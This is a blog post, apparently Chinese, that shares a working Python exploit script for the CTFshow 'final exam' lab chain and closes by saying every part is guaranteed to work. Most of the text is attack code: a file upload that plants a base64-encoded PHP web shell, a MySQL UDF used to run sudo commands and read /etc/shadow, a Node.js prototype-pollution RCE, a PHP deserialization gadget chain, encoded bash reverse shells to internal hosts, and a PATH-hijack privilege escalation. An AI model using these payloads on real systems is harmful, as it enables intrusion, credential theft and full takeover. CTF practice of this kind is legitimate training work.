CTFshow_终极考核_EXP

EXP ALL IN HERE

exp exp exp ヾ(・ω・`。)

import requests
import base64
import re
import time


def getShell(url):
    burp0_url = url + "system36d/users.php?action=upload"
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://b79ffce6-20e8-463a-849d-d5c8a96fa1fc.challenge.ctf.show/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary1qlfRm0gVIoKhBvA"}
    burp0_data = "\r\n------WebKitFormBoundary1qlfRm0gVIoKhBvA\r\nContent-Disposition: form-data; name=\"file\"; filename=\"backup.dat\"\r\nContent-Type: application/octet-stream\r\n\r\na113@bbb123|a114@bbb1234|admin@flag_645=ctfshow{28b00f799c2e059bafaa1d6bda138d89}|a2@bbb123|\r\n------WebKitFormBoundary1qlfRm0gVIoKhBvA--\r\n\r\n"
    res = requests.post(url = burp0_url, headers=burp0_headers, data=burp0_data)
    print(res.text)

    burp0_url = url + "system36d/util/common.php?k=flag_651=ctfshow{a4c64b86d754b3b132a138e3e0adcaa6}"
    burp0_cookies = {"UM_distinctid": "17b2b6330782cc-03724ea2851c3c-4343363-144000-17b2b633079ca2"}
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://c1be7167-28a0-4504-a5cd-04ca07fe2de6.challenge.ctf.show/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
    burp0_data = {"key": "key_is_here_you_know", "file": "../db/data_you_never_know.db", "1": "file_put_contents('udf.txt',hex2bin(''));echo shell_exec('cp udf.txt /usr/lib/mariadb/plugin/udf.so');echo shell_exec(\"echo PD89ZXZhbCgkX1BPU1RbMV0pPz4=|base64 -d>/var/www/html/1.php\");echo shell_exec('ip addr');"}

    res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
    print(res.text)
    if '172' in res.text:
        result = re.findall(r'172\.2\.([0-9]*)\.4\/24',res.text) 
        print(result)
        return result[0]

def runPython(url, payload):
    burp0_url = url + "1.php"
    burp0_cookies = {"UM_distinctid": "17b2b6330782cc-03724ea2851c3c-4343363-144000-17b2b633079ca2"}
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://b79ffce6-20e8-463a-849d-d5c8a96fa1fc.challenge.ctf.show/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
    burp0_data = {"1": f"echo `python3 -c \"{payload}\"`;"}
    res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
    print(res.text)

def runPHPshell_first(url, payload):
    burp0_url = url + "1.php"
    burp0_cookies = {"UM_distinctid": "17b2b6330782cc-03724ea2851c3c-4343363-144000-17b2b633079ca2"}
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://b79ffce6-20e8-463a-849d-d5c8a96fa1fc.challenge.ctf.show/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
    burp0_data = {"1": f"eval(base64_decode({payload}));"}
    res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
    print(res.text)

def runMysql_root_first(url, sql_payload):
    payload = r"""
    function query($sql){{
    $host='localhost';
    $username='root';
    $password='root';
    $database='ctfshow';

    $ret = array();

    $conn = new mysqli($host, $username, $password, $database);

    if ($conn->connect_error) {{
    die("连接失败: " . $conn->connect_error);
    }}

    $res = $conn->query($sql);
    if($res){{
        while ($row = $res->fetch_array(MYSQLI_NUM)) {{
            array_push($ret,$row);
        }}
        $res->close();
    }}
    else{{
    echo $conn->error;
    }}

    $conn->close();
    return $ret;
    }}

    $ret=query("{}");
    print_r(($ret));
    """.format(sql_payload)

    burp0_url = url + "1.php"
    burp0_cookies = {"UM_distinctid": "17b2b6330782cc-03724ea2851c3c-4343363-144000-17b2b633079ca2"}
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://b79ffce6-20e8-463a-849d-d5c8a96fa1fc.challenge.ctf.show/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
    burp0_data = {"1": f"{payload}"}
    res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
    print((res.text))

def nodejsShell(url, payload, net_id):
    payload = """
    {"__proto__":{"__proto__": {"type":"Block","nodes":"","compileDebug":1,"self":1,"line":"global.process.mainModule.require('child_process').exec('bash -c \\" echo """ + payload.decode('utf8') +"""|base64 -d|bash \\"')"}}}"""
    payload = base64.b64encode(payload.encode()).decode('utf8')

    burp0_url = url +"1.php"
    burp0_cookies = {"UM_distinctid": "17b2b6330782cc-03724ea2851c3c-4343363-144000-17b2b633079ca2"}
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://b79ffce6-20e8-463a-849d-d5c8a96fa1fc.challenge.ctf.show/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
    burp0_data = {"1": f"echo shell_exec('curl \"http://172.2.{net_id}.5:3000/login\" -X POST -H \"Content-Type: application/json\" -d \"`echo {payload}|base64 -d`\"');"}
    res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) 
    if "ret_code" in res.text:
        print("The first is Success")
    else:
        print(res.text)
    
    burp0_data = {"1": f"echo shell_exec('curl \"http://172.2.{net_id}.5:3000/\"');"}
    res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) 
    if "title is not defined" in res.text:
        print("The Second is Success\n")
    else:
        print(res.text)

def runPHP_eval_second(url, payload, net_id):
    burp0_url = url + "1.php"
    burp0_headers = {"Accept-Encoding": "gzip, deflate", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close"}
    
    burp0_data = {"1": "echo shell_exec('curl \"http://172.2."+net_id+".5:8888/index.php?r=site/unserialize&key=flag_663=ctfshow\\{fa5cc1fb0bfc986d1ef150269c0de197\\}\" -d \"UnserializeForm[ctfshowUnserializeData]=O%3A32%3A%22Codeception%5CExtension%5CRunProcess%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00output%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A5%3A%22jiang%22%3B%7Ds%3A43%3A%22%00Codeception%5CExtension%5CRunProcess%00processes%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3BO%3A28%3A%22GuzzleHttp%5CPsr7%5CAppendStream%22%3A2%3A%7Bs%3A37%3A%22%00GuzzleHttp%5CPsr7%5CAppendStream%00streams%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A29%3A%22GuzzleHttp%5CPsr7%5CCachingStream%22%3A2%3A%7Bs%3A43%3A%22%00GuzzleHttp%5CPsr7%5CCachingStream%00remoteStream%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bb%3A0%3B%7Ds%3A6%3A%22stream%22%3BO%3A26%3A%22GuzzleHttp%5CPsr7%5CPumpStream%22%3A3%3A%7Bs%3A34%3A%22%00GuzzleHttp%5CPsr7%5CPumpStream%00source%22%3BC%3A32%3A%22Opis%5CClosure%5CSerializableClosure%22%3A192%3A%7Ba%3A5%3A%7Bs%3A3%3A%22use%22%3Ba%3A0%3A%7B%7Ds%3A8%3A%22function%22%3Bs%3A37%3A%22function%28%29%7Beval%28%24_REQUEST%5B2%5D%29%3Bdie%28%29%3B%7D%22%3Bs%3A5%3A%22scope%22%3Bs%3A26%3A%22GuzzleHttp%5CPsr7%5CPumpStream%22%3Bs%3A4%3A%22this%22%3BN%3Bs%3A4%3A%22self%22%3Bs%3A32%3A%22000000006cfe4a45000000005bbc4366%22%3B%7D%7Ds%3A32%3A%22%00GuzzleHttp%5CPsr7%5CPumpStream%00size%22%3Bi%3A-10%3Bs%3A34%3A%22%00GuzzleHttp%5CPsr7%5CPumpStream%00buffer%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A1%3A%22j%22%3B%7D%7D%7D%7Ds%3A38%3A%22%00GuzzleHttp%5CPsr7%5CAppendStream%00seekable%22%3Bb%3A1%3B%7D%7D%7D%7D&2='.$_REQUEST[22].'%3b\"');", "22": f"eval(base64_decode({payload}));"}
    res = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
    print(res.text)
    save_txt(res.text)

def runPHP_eval_second_bypass(url, pwn_shell, net_id):
    phpBypass_second = f"""
    $myfile = fopen("/tmp/newfile.txt", "w") or die("Unable to open file!");
    $txt = base64_decode("");
    fwrite($myfile, $txt);
    fclose($myfile);

    $myfileContent = file_get_contents("/tmp/newfile.txt");
    $txt = base64_decode("{pwn_shell.decode('utf8')}");
    $myfileContent = $myfileContent . $txt;
    file_put_contents("/tmp/newfile.txt", $myfileContent);

    require_once("/tmp/newfile.txt");
    """

    phpBypass_second = base64.b64encode(phpBypass_second.encode())

    burp0_url = url + "1.php"
    burp0_headers = {"Accept-Encoding": "gzip, deflate", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close"}
    
    burp0_data = {"1": "echo shell_exec('curl \"http://172.2."+net_id+".5:8888/index.php?r=site/unserialize&key=flag_663=ctfshow\\{fa5cc1fb0bfc986d1ef150269c0de197\\}\" -d \"UnserializeForm[ctfshowUnserializeData]=O%3A32%3A%22Codeception%5CExtension%5CRunProcess%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00output%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A5%3A%22jiang%22%3B%7Ds%3A43%3A%22%00Codeception%5CExtension%5CRunProcess%00processes%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3BO%3A28%3A%22GuzzleHttp%5CPsr7%5CAppendStream%22%3A2%3A%7Bs%3A37%3A%22%00GuzzleHttp%5CPsr7%5CAppendStream%00streams%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A29%3A%22GuzzleHttp%5CPsr7%5CCachingStream%22%3A2%3A%7Bs%3A43%3A%22%00GuzzleHttp%5CPsr7%5CCachingStream%00remoteStream%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bb%3A0%3B%7Ds%3A6%3A%22stream%22%3BO%3A26%3A%22GuzzleHttp%5CPsr7%5CPumpStream%22%3A3%3A%7Bs%3A34%3A%22%00GuzzleHttp%5CPsr7%5CPumpStream%00source%22%3BC%3A32%3A%22Opis%5CClosure%5CSerializableClosure%22%3A192%3A%7Ba%3A5%3A%7Bs%3A3%3A%22use%22%3Ba%3A0%3A%7B%7Ds%3A8%3A%22function%22%3Bs%3A37%3A%22function%28%29%7Beval%28%24_REQUEST%5B2%5D%29%3Bdie%28%29%3B%7D%22%3Bs%3A5%3A%22scope%22%3Bs%3A26%3A%22GuzzleHttp%5CPsr7%5CPumpStream%22%3Bs%3A4%3A%22this%22%3BN%3Bs%3A4%3A%22self%22%3Bs%3A32%3A%22000000006cfe4a45000000005bbc4366%22%3B%7D%7Ds%3A32%3A%22%00GuzzleHttp%5CPsr7%5CPumpStream%00size%22%3Bi%3A-10%3Bs%3A34%3A%22%00GuzzleHttp%5CPsr7%5CPumpStream%00buffer%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A1%3A%22j%22%3B%7D%7D%7D%7Ds%3A38%3A%22%00GuzzleHttp%5CPsr7%5CAppendStream%00seekable%22%3Bb%3A1%3B%7D%7D%7D%7D&2='.$_REQUEST[22].'%3b\"');", "22": f"eval(base64_decode({phpBypass_second}));"}
    res = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
    print(res.text)
    save_txt(res.text)

def restartPHP(url):
    sql_payload = """CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';"""
    runMysql_root_first(url, sql_payload)

    sql_payload = """select sys_eval('sudo chmod 777 /usr/local/etc/php/php.ini;sudo ln -s /usr/bin/python3 /usr/bin/python')"""
    runMysql_root_first(url, sql_payload)

    sql_payload = """select sys_eval('sudo echo |base64 -d > /usr/local/etc/php/php.ini')"""
    runMysql_root_first(url, sql_payload)

    sql_payload = """select sys_eval('sudo kill -9 122 123 125 126 127 128; echo c3VkbyBwaHAtZnBtIHxzdWRvIG5naW54IAo=|base64 -d|bash ;ps aux;cat restart;sudo chmod 777 /usr/local/etc/php/php.ini')"""
    runMysql_root_first(url, sql_payload)


def save_txt(content):
    with open('./content.html','w',encoding="utf8") as f:
        f.write(content)

if __name__ == "__main__":
    url = "http://6c3a739e-e0be-4634-bb79-de883b7a543a.challenge.ctf.show/"
    # , proxies={'http':"http://127.0.0.1:8080"}
    net_id = getShell(url)

    pythonPayload = """
import os
print(os.system('cat /var/log/nginx/ctfshow_web_access_log_file_you_never_know.log;ip addr'))
    """
    # runPython(url,payload=pythonPayload)

    # phpPayload = f"echo shell_exec('curl \"http://172.2.{net_id}.5:80/public../tmp/\"');"
    phpPayload = f"echo shell_exec('ps aux;cat /usr/local/etc/php/php.ini|grep disable_fun');"
    runPHPshell_first(url, base64.b64encode(phpPayload.encode()))

    # restartPHP(url)
    
    # sql_payload = """CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';"""

    sql_payload = """select sys_eval('sudo cat /etc/shadow')"""
    
    # runMysql_root_first(url, sql_payload)
    # sudo kill -9 122 123 125 126 127 128 ;
    # /usr/local/etc/php/php.ini
    # cat /usr/local/etc/php/php.ini|grep disable_fun
    # sudo cat /etc/shadow

#     phpPayload = b"""
# require_once("/tmp/newfile.txt");
#     """

#     phpPayload = b"""
# $myfile = fopen("/tmp/newfile.txt", "w") or die("Unable to open file!");
# $txt = base64_decode("");
# fwrite($myfile, $txt);
# fclose($myfile);

# $myfileContent = file_get_contents("/tmp/newfile.txt");
# $txt = base64_decode("cHduKCd1bmFtZSAtYScpOw==");
# $myfileContent = $myfileContent . $txt;
# file_put_contents("/tmp/newfile.txt", $myfileContent);

# require_once("/tmp/newfile.txt");
#     """

    nodejs_shell = b"echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMi4xMDAuNC8yMzMzIDA+JjE=|base64 -d|bash;cat ./* >>/tmp/11.txt;"
    # nodejsShell(url,base64.b64encode(nodejs_shell),net_id)


    # runPHP_eval_second(url, base64.b64encode(phpPayload),net_id)
    
    # 反弹shell
    pwn_shell = """pwn('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMi4xNTAuNC8yMzMzIDA+JjE=|base64 -d|bash ');"""
    # 一键提权
    pwn_shell = """pwn('echo "nl /root/you_win||echo" > /tmp/cat ; chmod 777 /tmp/cat ; export PATH=/tmp:$PATH ; /getflag ;');"""
    # 第二台机 php rce
    # pwn_shell = """pwn('echo $PATH');"""
    runPHP_eval_second_bypass(url, base64.b64encode(pwn_shell.encode()),net_id)

    # phpPayload = f"echo shell_exec('curl \"http://172.2.{net_id}.5:80/public../tmp/newfile.txt\"');"
    # runPHPshell_first(url, base64.b64encode(phpPayload.encode()))

#  find /tmp/ -type f -name "*flag"|xargs sed -i "s#FLAG665# root/*FLAG665#g"


# nc -lvnp 2333
# python3 -c "import pty; pty.spawn('/bin/bash')"
# cd /tmp && echo "bash chmod 777 -R /root||echo" > cat && chmod 777 cat && export PATH=/tmp:$PATH && /getflag

都是用来拿各种shell的,有点乱,但保证都能用哈

你可能感兴趣的:(CTFshow,信息安全)